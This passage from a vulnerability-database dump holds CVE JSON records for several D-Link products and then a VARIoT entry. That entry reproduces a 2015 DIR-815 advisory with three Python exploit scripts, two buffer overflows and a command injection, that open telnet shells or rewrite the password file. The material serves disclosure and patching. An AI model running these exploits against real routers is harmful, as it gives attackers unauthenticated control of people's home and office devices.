"value": "D-Link Nuclias Connect firmware versions \u0026lt;= 1.3.1.4 contain a stored cross-site scripting (XSS) vulnerability due to improper sanitization of the \u0027Network\u0027 field when editing the configuration, creating a profile, and adding a network. An authenticated attacker can inject arbitrary JavaScript to be executed in the context of other users viewing the profile entry. NOTE: D-Link states that a fix is under development.\u003cbr\u003e"
}
],
"value": "D-Link Nuclias Connect firmware versions \u003c= 1.3.1.4 contain a stored cross-site scripting (XSS) vulnerability due to improper sanitization of the \u0027Network\u0027 field when editing the configuration, creating a profile, and adding a network. An authenticated attacker can inject arbitrary JavaScript to be executed in the context of other users viewing the profile entry. NOTE: D-Link states that a fix is under development."
}
],
"impacts": [
{
"capecId": "CAPEC-592",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-592 Stored XSS"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 5.1,
"baseSeverity": "MEDIUM",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "LOW",
"subIntegrityImpact": "LOW",
"userInteraction": "PASSIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or \u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-14T02:07:58.251Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/dlink-nuclias-connect-stored-xss"
},
{
"tags": [
"product"
],
"url": "https://www.dlink.com/en/for-business/nuclias/nuclias-connect"
},
{
"tags": [
"vendor-advisory"
],
"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10472"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "D-Link Nuclias Connect \u003c= v1.3.1.4 Stored Cross-Site Scripting (XSS)",
"x_generator": {
"engine": "vulncheck"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34253",
"datePublished": "2025-10-16T18:53:49.731Z",
"dateReserved": "2025-04-15T19:15:22.578Z",
"dateUpdated": "2026-05-14T02:07:58.251Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-34255 (GCVE-0-2025-34255)
Vulnerability from cvelistv5 – Published: 2025-10-16 18:52 – Updated: 2026-05-25 23:41- CWE-204 - Observable Response Discrepancy
| URL | Tags |
|---|---|
| https://www.vulncheck.com/advisories/dlink-nuclia… | third-party-advisory |
| https://www.dlink.com/en/for-business/nuclias/nuc… | product |
| https://supportannouncement.us.dlink.com/security… | vendor-advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| D-Link | Nuclias Connect |
Affected:
0 , ≤ 1.3.1.4
(custom)
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-34255",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-17T14:29:11.316268Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-17T14:29:17.095Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"modules": [
"web interface"
],
"product": "Nuclias Connect",
"vendor": "D-Link",
"versions": [
{
"lessThanOrEqual": "1.3.1.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dlink:nuclias_connect:*:*:*:*:*:*:*:*",
"versionEndExcluding": "1.3.1.4",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "OR"
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Alex Williams from Pellera Technologies"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "D-Link Nuclias Connect firmware versions \u0026lt;= 1.3.1.4 contain an observable response discrepancy vulnerability.\u0026nbsp;The application\u0027s \u0027Forgot Password\u0027 endpoint returns distinct JSON responses depending on whether the supplied email address is associated with an existing account. Because the responses differ in the `data.exist` boolean value, an unauthenticated remote attacker can enumerate valid email addresses/accounts on the server.\u0026nbsp;NOTE: D-Link states that a fix is under development.\u003cbr\u003e"
}
],
"value": "D-Link Nuclias Connect firmware versions \u003c= 1.3.1.4 contain an observable response discrepancy vulnerability.\u00a0The application\u0027s \u0027Forgot Password\u0027 endpoint returns distinct JSON responses depending on whether the supplied email address is associated with an existing account. Because the responses differ in the `data.exist` boolean value, an unauthenticated remote attacker can enumerate valid email addresses/accounts on the server.\u00a0NOTE: D-Link states that a fix is under development."
}
],
"impacts": [
{
"capecId": "CAPEC-575",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-575 Account Footprinting"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-204",
"description": "CWE-204 Observable Response Discrepancy",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-25T23:41:31.628Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/dlink-nuclias-connect-forgot-password-account-enumeration"
},
{
"tags": [
"product"
],
"url": "https://www.dlink.com/en/for-business/nuclias/nuclias-connect"
},
{
"tags": [
"vendor-advisory"
],
"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10472"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "D-Link Nuclias Connect \u003c= v1.3.1.4 Forgot Password Account Enumeration",
"x_generator": {
"engine": "vulncheck"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34255",
"datePublished": "2025-10-16T18:52:59.964Z",
"dateReserved": "2025-04-15T19:15:22.578Z",
"dateUpdated": "2026-05-25T23:41:31.628Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-34254 (GCVE-0-2025-34254)
Vulnerability from cvelistv5 – Published: 2025-10-16 18:52 – Updated: 2026-05-25 23:41- CWE-204 - Observable Response Discrepancy
| URL | Tags |
|---|---|
| https://www.vulncheck.com/advisories/dlink-nuclia… | third-party-advisory |
| https://www.dlink.com/en/for-business/nuclias/nuc… | product |
| https://supportannouncement.us.dlink.com/security… | vendor-advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| D-Link | Nuclias Connect |
Affected:
0 , ≤ 1.3.1.4
(custom)
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-34254",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-17T14:29:43.264857Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-17T14:29:49.920Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"modules": [
"web interface"
],
"product": "Nuclias Connect",
"vendor": "D-Link",
"versions": [
{
"lessThanOrEqual": "1.3.1.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dlink:nuclias_connect:*:*:*:*:*:*:*:*",
"versionEndExcluding": "1.3.1.4",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "OR"
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Alex Williams from Pellera Technologies"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "D-Link Nuclias Connect firmware versions \u0026lt;= 1.3.1.4 contain an observable response discrepancy vulnerability.\u0026nbsp;The application\u0027s \u0027Login\u0027 endpoint returns distinct JSON responses depending on whether the supplied username is associated with an existing account. Because the responses differ in the `error.message`string value, an unauthenticated remote attacker can enumerate valid usernames/accounts on the server.\u0026nbsp;NOTE: D-Link states that a fix is under development.\u003cbr\u003e"
}
],
"value": "D-Link Nuclias Connect firmware versions \u003c= 1.3.1.4 contain an observable response discrepancy vulnerability.\u00a0The application\u0027s \u0027Login\u0027 endpoint returns distinct JSON responses depending on whether the supplied username is associated with an existing account. Because the responses differ in the `error.message`string value, an unauthenticated remote attacker can enumerate valid usernames/accounts on the server.\u00a0NOTE: D-Link states that a fix is under development."
}
],
"impacts": [
{
"capecId": "CAPEC-575",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-575 Account Footprinting"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-204",
"description": "CWE-204 Observable Response Discrepancy",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-25T23:41:30.851Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/dlink-nuclias-connect-login-account-enumeration"
},
{
"tags": [
"product"
],
"url": "https://www.dlink.com/en/for-business/nuclias/nuclias-connect"
},
{
"tags": [
"vendor-advisory"
],
"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10472"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "D-Link Nuclias Connect \u003c= v1.3.1.4 Login Account Enumeration",
"x_generator": {
"engine": "vulncheck"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34254",
"datePublished": "2025-10-16T18:52:08.435Z",
"dateReserved": "2025-04-15T19:15:22.578Z",
"dateUpdated": "2026-05-25T23:41:30.851Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-9566 (GCVE-0-2024-9566)
Vulnerability from cvelistv5 – Published: 2024-10-07 13:00 – Updated: 2024-10-07 13:25 Unsupported When Assigned- CWE-120 - Buffer Overflow
| URL | Tags |
|---|---|
| https://vuldb.com/?id.279460 | vdb-entrytechnical-description |
| https://vuldb.com/?ctiid.279460 | signaturepermissions-required |
| https://vuldb.com/?submit.414541 | third-party-advisory |
| https://github.com/abcdefg-png/IoT-vulnerable/blo… | exploit |
| https://www.dlink.com/ | product |
| Vendor | Product | Version | |
|---|---|---|---|
| D-Link | DIR-619L B1 |
Affected:
2.06
|
|
| d-link | dir-619l_b1 |
Affected:
2.06
cpe:2.3:h:d-link:dir-619l_b1:*:*:*:*:*:*:*:* |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:h:d-link:dir-619l_b1:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "dir-619l_b1",
"vendor": "d-link",
"versions": [
{
"status": "affected",
"version": "2.06"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-9566",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-07T13:22:53.741353Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-10-07T13:25:20.194Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "DIR-619L B1",
"vendor": "D-Link",
"versions": [
{
"status": "affected",
"version": "2.06"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "yhryhryhr_miemie (VulDB User)"
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability classified as critical was found in D-Link DIR-619L B1 2.06. This vulnerability affects the function formDeviceReboot of the file /goform/formDeviceReboot. The manipulation of the argument next_page leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used."
},
{
"lang": "de",
"value": "In D-Link DIR-619L B1 2.06 wurde eine Schwachstelle entdeckt. Sie wurde als kritisch eingestuft. Es geht um die Funktion formDeviceReboot der Datei /goform/formDeviceReboot. Mittels dem Manipulieren des Arguments next_page mit unbekannten Daten kann eine buffer overflow-Schwachstelle ausgenutzt werden. Der Angriff kann \u00fcber das Netzwerk erfolgen. Der Exploit steht zur \u00f6ffentlichen Verf\u00fcgung."
}
],
"metrics": [
{
"cvssV4_0": {
"baseScore": 8.7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0"
}
},
{
"cvssV3_1": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"cvssV3_0": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
},
{
"cvssV2_0": {
"baseScore": 9,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-120",
"description": "Buffer Overflow",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-10-07T13:00:07.587Z",
"orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"shortName": "VulDB"
},
"references": [
{
"name": "VDB-279460 | D-Link DIR-619L B1 formDeviceReboot buffer overflow",
"tags": [
"vdb-entry",
"technical-description"
],
"url": "https://vuldb.com/?id.279460"
},
{
"name": "VDB-279460 | CTI Indicators (IOB, IOC, IOA)",
"tags": [
"signature",
"permissions-required"
],
"url": "https://vuldb.com/?ctiid.279460"
},
{
"name": "Submit #414541 | D-Link DIR-619L B1 2.06 Buffer Overflow",
"tags": [
"third-party-advisory"
],
"url": "https://vuldb.com/?submit.414541"
},
{
"tags": [
"exploit"
],
"url": "https://github.com/abcdefg-png/IoT-vulnerable/blob/main/D-Link/DIR-619L/formDeviceReboot.md"
},
{
"tags": [
"product"
],
"url": "https://www.dlink.com/"
}
],
"tags": [
"unsupported-when-assigned"
],
"timeline": [
{
"lang": "en",
"time": "2024-10-07T00:00:00.000Z",
"value": "Advisory disclosed"
},
{
"lang": "en",
"time": "2024-10-07T02:00:00.000Z",
"value": "VulDB entry created"
},
{
"lang": "en",
"time": "2024-10-07T08:25:15.000Z",
"value": "VulDB entry last update"
}
],
"title": "D-Link DIR-619L B1 formDeviceReboot buffer overflow"
}
},
"cveMetadata": {
"assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"assignerShortName": "VulDB",
"cveId": "CVE-2024-9566",
"datePublished": "2024-10-07T13:00:07.587Z",
"dateReserved": "2024-10-07T06:19:48.194Z",
"dateUpdated": "2024-10-07T13:25:20.194Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-5299 (GCVE-0-2024-5299)
Vulnerability from cvelistv5 – Published: 2024-05-23 21:30 – Updated: 2024-08-01 21:11- CWE-749 - Exposed Dangerous Method or Function
| URL | Tags |
|---|---|
| https://www.zerodayinitiative.com/advisories/ZDI-… | x_research-advisory |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:d-link:d-view:0:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "d-view",
"vendor": "d-link",
"versions": [
{
"lessThan": "2.0.3.88",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-5299",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-24T13:43:24.500112Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T18:02:55.399Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T21:11:11.554Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "ZDI-24-450",
"tags": [
"x_research-advisory",
"x_transferred"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-450/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unknown",
"product": "D-View",
"vendor": "D-Link",
"versions": [
{
"status": "affected",
"version": "2.0.1.28"
}
]
}
],
"dateAssigned": "2024-05-23T21:29:10.311Z",
"datePublic": "2024-05-14T15:21:59.534Z",
"descriptions": [
{
"lang": "en",
"value": "D-Link D-View execMonitorScript Exposed Dangerous Method Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of D-Link D-View. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the execMonitorScript method. The issue results from an exposed dangerous method. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21828."
}
],
"metrics": [
{
"cvssV3_0": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-749",
"description": "CWE-749: Exposed Dangerous Method or Function",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-05-23T21:30:14.551Z",
"orgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"shortName": "zdi"
},
"references": [
{
"name": "ZDI-24-450",
"tags": [
"x_research-advisory"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-450/"
}
],
"source": {
"lang": "en",
"value": "06fe5fd2bc53027c4a3b7e395af0b850e7b8a044"
},
"title": "D-Link D-View execMonitorScript Exposed Dangerous Method Remote Code Execution Vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"assignerShortName": "zdi",
"cveId": "CVE-2024-5299",
"datePublished": "2024-05-23T21:30:14.551Z",
"dateReserved": "2024-05-23T21:29:10.280Z",
"dateUpdated": "2024-08-01T21:11:11.554Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
VAR-201507-0645
Vulnerability from variot - Updated: 2024-07-23 22:41D-Link is an internationally renowned provider of network equipment and solutions, including a variety of router equipment. D-Link is a D-Link company dedicated to the research, development, production and marketing of local area networks, broadband networks, wireless networks, voice networks and related network equipment. A buffer overflow vulnerability exists in D-Link due to the program not performing correct boundary checks on user-submitted input. An attacker could use this vulnerability to execute arbitrary code in the context of an affected device and may also cause a denial of service. The following products are affected: D-Link Ethernet Broadband Router. ## Advisory Information
Title: DIR-815 Buffer overflows and Command injection in authentication and HNAP functionalities Vendors contacted: William Brown william.brown@dlink.com, Patrick Cline patrick.cline@dlink.com(Dlink) CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
Product Description
DIR-815 -- Wireless N300 Dual Band Router. Mainly used by home and small offices.
Vulnerabilities Summary
Have come across 3 security issues in DIR-815 firmware which allows an attacker to exploit command injection and buffer overflows in authentication adn HNAP functionality. All of them can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed.
Details
Buffer overflow in auth
import urllib import urllib2
This exploits the auth_main.cgi with read buffer overflow exploit for v2.02
prequisite is just to have id and password fields in params
url = 'http://192.168.0.1/authentication.cgi' junk = "A"1004+"B"37+"\x58\xf8\x40\x00" # address of system function in executable junk+="X"*164+'echo "Admin" "Admin" "0" > /var/passwd\x00'+"AAAA" values = "id=test&password=test&test="+junk
req = urllib2.Request(url, values) response = urllib2.urlopen(req) the_page = response.read()
Buffer overflow in HNAP
import socket import struct
format junk+ROP1(have right value in A0) + ROP2(add or subtract to create right system address) + ROP3(Jump to right address)
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";sh;"+"H"286 buf+= "\x40\xF4\xB1\x2A" # (ROP gadget which puts right value in A0) buf+= "B"20+"ZZZZ"+"telnetd -p 6778"+"C"*5 # adjustment to get to the right payload buf+="\xA0\xb2\xb4\x2a" # The system address is 2Ab4b200 so changing that in GDB just before jumping to test if it works which it does not buf+= "\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("1.2.3.4", 80)) s.send(buf)
Command injection in
import socket import struct
CSRF or any other trickery, but probably only works when connected to network I suppose
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 99.249.143.124\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ';telnetd -p 9090;\r\n' + "1\r\n\r\n"
print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.0.1", 80)) s.send(buf)
Report Timeline
- April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
- July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
- Nov 13, 2015: A public advisory is sent to security mailing lists.
Credit
This vulnerability was found by Samuel Huntley (samhuntley84@gmail.com)
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201507-0645",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ethernet broadband router",
"scope": null,
"trust": 1.2,
"vendor": "dlink",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Samuel Huntley",
"sources": [
{
"db": "PACKETSTORM",
"id": "134368"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011"
}
],
"trust": 1.3
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2015-05077",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2015-05076",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2015-05077",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2015-05076",
"trust": 0.6,
